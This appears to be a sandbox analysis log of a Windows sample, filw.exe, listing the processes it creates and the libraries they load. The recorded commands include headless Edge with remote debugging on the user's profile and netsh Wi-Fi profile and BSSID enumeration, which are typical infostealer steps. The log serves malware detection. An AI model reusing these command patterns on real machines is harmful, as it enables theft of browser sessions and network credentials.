Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5be28a57-b86d-4b0e-85c0-f6e6ec846e1e.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-logging --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,4376263706655546236,12928841589883637916,262144 --disable-features=PaintHolding /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2132 --field-trial-handle=2040,i,9187529698848839277,3688106472142960608,262144 --disable-features=PaintHolding /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2180 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6384 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6736 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6928 --field-trial-handle=1984,i,10664872617930172595,16212941037007434464,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 7432
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK

Source: C:\Users\user\Desktop\filw.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Section loaded: websocket.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\filw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\filw.exe

